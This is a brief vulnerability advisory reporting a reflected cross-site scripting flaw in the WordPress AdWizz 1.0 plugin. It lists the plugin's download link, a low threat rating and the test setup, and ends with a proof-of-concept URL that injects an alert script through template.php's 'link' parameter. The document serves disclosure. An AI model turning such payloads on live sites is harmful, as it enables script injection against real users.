A reflected cross site scripting vulnerability in WordPress AdWizz version 1.0 can be exploited to execute arbitrary JavaScript.
8a9d9c1ebf2a627cef743834e525f4f080dfc7ac0068d836e37f7d69613ef26b
------------------------------------------------------------------------
Software................WordPress AdWizz 1.0
Vulnerability...........Reflected Cross-site Scripting
Threat Level............Low (1/5)
Download................http://wordpress.org/extend/plugins/ad-wizz/
Discovery Date..........4/3/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------
--Description--
A reflected cross-site scripting vulnerability in WordPress AdWizz 1.0
can be exploited to execute arbitrary JavaScript.
--PoC--
http://localhost/wordpress/wp-content/plugins/ad-wizz/template.php?link=%22;%3C/script%3E%3Cscript%3Ealert(0);{//